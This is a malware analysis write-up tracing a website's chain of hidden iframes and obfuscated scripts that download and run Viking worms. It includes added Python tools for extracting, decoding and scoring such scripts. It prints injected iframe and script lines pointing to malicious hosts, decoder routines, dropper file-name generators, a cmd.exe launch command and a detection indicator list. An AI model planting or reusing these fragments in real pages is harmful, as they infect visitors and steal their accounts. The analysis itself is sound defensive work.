A website that downloads at least three Viking worms and other malicious programs


Endurer original, version 1

A netizen reported that, shortly after his computer opened a certain website, the real-time monitoring of his anti-virus software was disabled, the system time was modified, and a number of Trojans that steal online-game and chat accounts were installed.

Checking the homepage code of the website, I found:
/---
if (parent.window.opener) parent.window.opener.location = 'hxxp://aa***a.sqr***s11***0.com/';
...... (omitted) ......
<script src="hxxp://m***a.china***s**es**e.net/top.js"></script>
---/

The code of hxxp://sqr***s1***.s***e*771.com/ includes:
/---
<iframe src="hxxp://m***.china**s*es**e.net/110.htm" width="0" height="0" frameborder="0"></iframe>
---/

The code of 110.htm includes:
/---
<iframe src="hxxp://wg***.72***9*72.com/index.htm" width="0" height="0" frameborder="0"></iframe>
---/

The code of index.htm includes:
/---
<iframe src="hxxp://union**.0***kis.com/in.htm?7141" width="0" height="0" frameborder="0"></iframe>
---/

The code of in.htm?7141 includes:
/---
<script src=css.js></script>
<html>
<title>
test
</title>
<body>
<iframe src=test.htm width=0 height=0></iframe>
test
</body>
</html>
---/
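The chain above is a series of zero-size iframes and external scripts, each pulling in the next page. As an added example (not part of the original post), the following Python script pulls every `<iframe>` and `<script>` with an external `src` out of a page, flags the invisible ones (width and height both 0) and `JScript.Encode` scripts, and walks the chain through the pages it has. The sample pages are constructed here after the snippets in the post; the hxxp scheme and the asterisks are the post's own defanging and redaction, kept as-is.

```python
from html.parser import HTMLParser

# Constructed sample pages modelled on the chain in this write-up. Pages are keyed by the
# last path segment of the URL that loads them.
SAMPLE_PAGES = {
    "index.htm": (
        '<IFRAME src="hxxp://union**.0***kis.com/in.htm?7141" '
        'width="0" Height="0" frameborder="0"></iframe>'
    ),
    "in.htm?7141": (
        "<SCRIPT src=css.js></SCRIPT><html><title>test</title><body>"
        "<IFRAME src=test.htm width=0 Height=0></iframe>test</body></html>"
    ),
    # What top.js writes once its \xNN-escaped strings are decoded (see later in the post).
    "top.js (decoded)": (
        "<iframe width='0' height='0' src='hxxp://m***.china**s*es**e.net/1100.htm'></iframe>"
        '<p align="center"><iframe frameborder=no width=760 height=80 '
        "src=hxxp://m***.china**s*es**e.net/110.htm></iframe></p>"
    ),
}


def is_zero(value):
    """True for a width/height attribute that collapses the frame: 0, "0", '0', 0px."""
    if value is None:
        return False
    return value.strip().strip("'\"").lower().rstrip("px").strip() == "0"


class LoaderExtractor(HTMLParser):
    """Collect every <iframe> and <script> that pulls in an external resource."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, src, flag)

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k: (v if v is not None else "") for k, v in attrs}
        src = a.get("src", "").strip()
        if not src:
            return
        flag = ""
        if tag == "iframe" and is_zero(a.get("width")) and is_zero(a.get("height")):
            flag = "zero-size"        # invisible frame: the classic drive-by loader
        elif tag == "script" and a.get("language", "").lower() == "jscript.encode":
            flag = "jscript.encode"   # encoded script, as in 8549647.htm later in the post
        self.findings.append((tag, src, flag))


def extract_loaders(html):
    p = LoaderExtractor()
    p.feed(html)
    p.close()
    return p.findings


def page_key(src):
    """Map a src URL to the key used in SAMPLE_PAGES (its last path segment)."""
    return src.rsplit("/", 1)[-1]


def follow_chain(pages, start, seen=None):
    """Walk the loader chain depth-first through the pages we have, without looping."""
    seen = seen if seen is not None else set()
    if start in seen or start not in pages:
        return []
    seen.add(start)
    hops = []
    for tag, src, flag in extract_loaders(pages[start]):
        hops.append((start, tag, src, flag))
        hops.extend(follow_chain(pages, page_key(src), seen))
    return hops


if __name__ == "__main__":
    for hop in follow_chain(SAMPLE_PAGES, "index.htm"):
        print("%-18s %-7s %-45s %s" % hop)
    for hop in follow_chain(SAMPLE_PAGES, "top.js (decoded)"):
        print("%-18s %-7s %-45s %s" % hop)
```

The visible 760x80 frame that top.js also writes is listed but not flagged, which is the point of checking both dimensions rather than the mere presence of an iframe.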

The content of css.js uses eval() to run a custom function. After two rounds of decryption, JavaScript code is obtained that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file love.exe and save it to %WINDIR%. The file name is generated by the function:
/---
function gn(n){var number=Math.random()*n; return Math.round(number)+'.exe';}
---/
that is, ***.exe (where * is a digit). The file is then run through the ShellExecute method of the Shell.Application object with the command: %WINDIR%\system32\cmd.exe /C %WINDIR%\***.exe

The code of test.htm includes:
/---
<head>
<title>test</title>
<script src="test.js"></script>
</head>
<script>
exec();
</script>
</body>
---/

The content of test.js is not encrypted. It uses ActiveXObject("ThunderServer.webThunder.1") (the Thunder download manager control) to download love.exe, saves it to C:\, and runs it from a timer.

File Description: D:/test/love.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 21:41:28
Modification time: 21:41:30
Access time:
Size: 95232 bytes, 93.0 KB
MD5: 0b75d7947a9ac806318170a2cd45188a

Kaspersky reports Worm.Win32.Viking.lm; Rising reports Worm.Viking.TC.

Scanned file: love.exe - infected

love.exe - infected by Worm.Win32.Viking.lm

Statistics:
Known viruses: 340918   Updated: 06-06-2007
File size (Kb): 93      Virus bodies: 1
Files: 1                Warnings: 0
Archives: 0             Suspicious: 0

The code of hxxp://m***a.china***s**es**e.net/top.js has the form:
/---
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c ...... (omitted) ...... \x3e");
...... (omitted) ......
window["\x64 ...... (omitted) ...... \x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c//cross\x3e");
...... (omitted) ......
---/
The decrypted HTML code is:
/---
<iframe width='0' height='0' src='hxxp://m***.china**s*es**e.net/1100.htm'></iframe>
<iframe width='0' height='0' src='hxxp://9.72972.com/index.html'></iframe>
<iframe width='0' height='0' src='hxxp://wg***.72***9*72.com/'></iframe>
<p align="center">
<iframe frameborder=no border=0 marginwidth=0 marginheight=0 scrolling=no width=760 height=80 src=hxxp://m***.china**s*es**e.net/110.htm target="_blank" name="I1"></iframe>
</p>
---/

The content of 1100.htm is VBScript code. It uses a custom function:
/---
Function rechange(k)
  s = Split(k, Chr(-24081))
  t = ""
  For i = 0 To UBound(s)
    kellav = Eval(s(i))
    t = t + Chr(kellav)
  Next
  rechange = t
End Function
---/
to decrypt the variable t = "68★105★109 ...... (omitted) ......★13★10", and then runs the result with Execute.
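Both obfuscation layers seen so far (the `\xNN`-escaped property names in top.js and the ★-joined character codes that rechange() turns back into VBScript) are simple enough to undo statically without running the script. The following Python is an added example, not code from the post: it decodes `\xNN` escapes and rewrites `obj["name"]` as `obj.name`, and it ports rechange() to Python. The separator is derived the way VBScript's Chr() does it on a Chinese (DBCS) system, where Chr(-24081) is the two-byte GBK value 0xA1EF, i.e. ★, which matches the dump of t in the post; the sample inputs are constructed here, and using int() for the post's plain decimal literals in place of Eval() is my simplification.

```python
import re

# Constructed samples modelled on the escaped top.js and the 1100.htm variable t.
SAMPLE_TOP_JS = r'window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65\x3e")'
SAMPLE_T = "68★105★109★13★10"

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
BRACKET_NAME = re.compile(r'\["([A-Za-z_$][\w$]*)"\]')


def decode_js_hex_escapes(text):
    """Replace every \\xNN escape with the character it stands for."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def simplify_bracket_access(js):
    """Decode escapes, then rewrite obj["name"] as obj.name so the call reads naturally."""
    return BRACKET_NAME.sub(r".\1", decode_js_hex_escapes(js))


def vbs_chr_dbcs(code, codepage="gbk"):
    """VBScript Chr() on a DBCS system (Chinese/GBK here): a code outside 0..255 is taken
    as a 16-bit value whose two bytes form one double-byte character."""
    return (code & 0xFFFF).to_bytes(2, "big").decode(codepage)


SEPARATOR = vbs_chr_dbcs(-24081)  # the ★ seen in the post's dump of t


def rechange(k, sep=SEPARATOR):
    """Python port of the page's VBScript rechange(): split on the separator, take each
    piece as a number (int() stands in for Eval(), since the post shows plain decimal
    literals) and append Chr() of it."""
    out = []
    for piece in k.split(sep):
        piece = piece.strip()
        if piece:
            out.append(chr(int(piece)))
    return "".join(out)


if __name__ == "__main__":
    print(simplify_bracket_access(SAMPLE_TOP_JS))
    print(repr(rechange(SAMPLE_T)))
```

The first three codes of t (68, 105, 109) decode to "Dim", the start of a VBScript declaration, and the trailing 13, 10 is the CR LF line ending, which is a quick sanity check that the separator and decoding are right before reading further.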

The decrypted value of t is VBScript code that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 123.exe, save it in the Temporary Internet Files folder under the name hbstwgp.com, and then create the file pdoqmyn.vbs with the content:
/---
Set shell = CreateObject("WScript.Shell")
shell.Run("<path of hbstwgp.com in the Temporary Internet Files folder>")
Set shell = Nothing
---/
pdoqmyn.vbs is then run through the ShellExecute method of the Shell.Application object, which in turn runs hbstwgp.com.

File Description: D:/test/123.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 22:25:23
Modification time: 22:25:24
Access time:
Size: 25291 bytes, 24.715 KB
MD5: 56c51cac7f6301be1b3c395d7bd226b8

Kaspersky reports Virus.Win32.AutoRun.f.

Scanned file: 123.exe - infected

123.exe - infected by Virus.Win32.AutoRun.f

Statistics:
Known viruses: 340941   Updated: 06-06-2007
File size (Kb): 25      Virus bodies: 1
Files: 1                Warnings: 0
Archives: 0             Suspicious: 0

The code of hxxp://9.72972.com/index.html includes:
/---
<iframe src="hxxp://www.p*u**m*a1**64.com/p0000u00000000/8549647.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://s***w***k*ee.com/aacc.htm?23" width="0" height="0" frameborder="0"></iframe>
---/

The code of hxxp://www.p*u**m*a1**64.com/p?u=#/8549647.htm includes:
/---
<script language="JScript.Encode" src=164.js></script>
---/

The content of hxxp://www.p*u**m*a1**64.com/p?u=#/164.js uses eval() to run a custom function. After three rounds of decryption, JavaScript code is obtained that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 1.exe and save it to %WINDIR%. The file name is generated by the function:
/---
function gn(n){var number=Math.random()*n; return Math.round(number)+'.exe';}
---/
that is, ***.exe (where * is a digit). The file is then run through the ShellExecute method of the Shell.Application object with the command: %WINDIR%\system32\cmd.exe /C %WINDIR%\***.exe

File Description: D:/test/1.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:30:27
Modification time: 22:30:28
Access time:
Size: 95232 bytes, 93.0 KB
MD5: f13950bd6b6c31e10a8c66c5c3141aeb

Kaspersky reports Worm.Win32.Viking.lr; Rising reports Worm.Viking.Te.

Scanned file: 1.exe - infected

1.exe - infected by Worm.Win32.Viking.lr

Statistics:
Known viruses: 340941   Updated: 06-06-2007
File size (Kb): 93      Virus bodies: 1
Files: 1                Warnings: 0
Archives: 0             Suspicious: 0

The code of hxxp://s***w***k***ee.com/aacc.htm?23 includes:
/---
<script src=windows.js></script>
---/

The content of windows.js uses eval() to run a custom function. After decryption, JavaScript code is obtained that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file xz.exe and save it to %WINDIR%. The file name is generated by the function:
/---
function ks(vpn){var num=Math.random()*vpn; return '~temp'+Math.round(num)+'.tmp'}
---/
that is, ~temp***.tmp (where * is a digit). The file is then run through the ShellExecute method of the Shell.Application object with the command: %WINDIR%\system32\cmd.exe /C %WINDIR%\~temp***.tmp
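Every decoded stage in this post (css.js, test.js, the VBScript in 1100.htm, 164.js and windows.js) ends up with the same small set of COM objects and the same launch pattern: Microsoft.XMLHTTP to fetch, Scripting.FileSystemObject to write, Shell.Application/ShellExecute or WScript.Shell to run, cmd.exe /C on a randomly named file under %WINDIR%. As an added example, not from the post, the Python below scores a decoded script against those indicators and also recovers the on-disk naming pattern from the two generator shapes shown (Math.round(x)+'.exe' and '~temp'+Math.round(x)+'.tmp'), which is what you would look for in %WINDIR% on a suspected machine. The weights, the threshold and the two sample scripts are mine; the sample "decoded" fragment is constructed to resemble the described stages and is not the real decoded code.

```python
import re

# Indicators taken from the decoded stages described in the post. Weights and the
# threshold are my own choice: any two of the fetch/write/run objects together cross it.
INDICATORS = [
    ("eval() unpacking",               r"\beval\s*\(",                       1),
    ("Microsoft.XMLHTTP",              r"Microsoft\.XMLHTTP",                2),
    ("Scripting.FileSystemObject",     r"Scripting\.FileSystemObject",       2),
    ("Shell.Application/ShellExecute", r"Shell\.Application|ShellExecute",   3),
    ("WScript.Shell",                  r"WScript\.Shell",                    2),
    ("ThunderServer.webThunder",       r"ThunderServer\.webThunder",         3),
    ("JScript.Encode",                 r"JScript\.Encode",                   2),
    ("cmd.exe /C launch",              r"cmd\.exe\s*/C",                     2),
    ("random file name",               r"Math\.random\s*\(\s*\)",            1),
    ("drop into %WINDIR%",             r"%WINDIR%",                          1),
]
THRESHOLD = 4

# Matches both generator shapes on the page: Math.round(x)+'.exe' and '~temp'+Math.round(x)+'.tmp'
NAME_GENERATOR = re.compile(
    r"(?:'([^']*)'\s*\+\s*)?Math\.round\s*\([^)]*\)\s*\+\s*'([^']*)'", re.IGNORECASE)


def scan_script(text):
    """Return (score, [indicator names]) for a decoded script."""
    score, found = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            found.append(name)
            score += weight
    return score, found


def dropped_name_patterns(text):
    """Recover the payload's on-disk naming pattern, e.g. '<N>.exe' or '~temp<N>.tmp'."""
    return [prefix + "<N>" + suffix for prefix, suffix in NAME_GENERATOR.findall(text)]


def verdict(text):
    score, found = scan_script(text)
    label = "downloader-like" if score >= THRESHOLD else "benign-looking"
    return label, score, found


# Constructed samples: a fragment shaped like the decoded css.js/windows.js stages
# (object creation and naming only), and a harmless page script for comparison.
SAMPLE_DECODED = r"""
var h = new ActiveXObject("Microsoft.XMLHTTP");
var f = new ActiveXObject("Scripting.FileSystemObject");
function gn(n){var number=Math.random()*n; return Math.round(number)+'.exe';}
function ks(vpn){var num=Math.random()*vpn; return '~temp'+Math.round(num)+'.tmp'}
var s = new ActiveXObject("Shell.Application");
var cmd = "%WINDIR%\\system32\\cmd.exe /C %WINDIR%\\" + ks(1000);
"""
SAMPLE_BENIGN = "var n = Math.round(Math.random()*10); document.getElementById('d').innerHTML = n;"


if __name__ == "__main__":
    for label, sample in (("decoded stage", SAMPLE_DECODED), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(sample), dropped_name_patterns(sample))
```

Math.random() on its own is worth only one point, so ordinary page scripts that pick a random number stay below the threshold; it is the combination with the fetch, write and run objects that marks a downloader.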

File Description: D:/test/xz.exe
Attribute: ---
Language: Chinese (China)
File version: 1.0.0.0
Note:
Copyright:
Note:
Product Version: 1.0.0.0
Product Name:
Company Name:
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:39:49
Modification time: 22:39:50
Access time:
Size: 105472 bytes, 103.0 KB
MD5: 692bdc6c4e92c7cc44fd623eaa8e1ddc

Kaspersky reports Worm.Win32.Viking.bd; Rising reports Worm.Viking.El.

Scanned file: xz.exe - infected

xz.exe - infected by Worm.Win32.Viking.bd

Statistics:
Known viruses: 340941   Updated: 06-06-2007
File size (Kb): 103     Virus bodies: 1
Files: 1                Warnings: 0
Archives: 0             Suspicious: 0
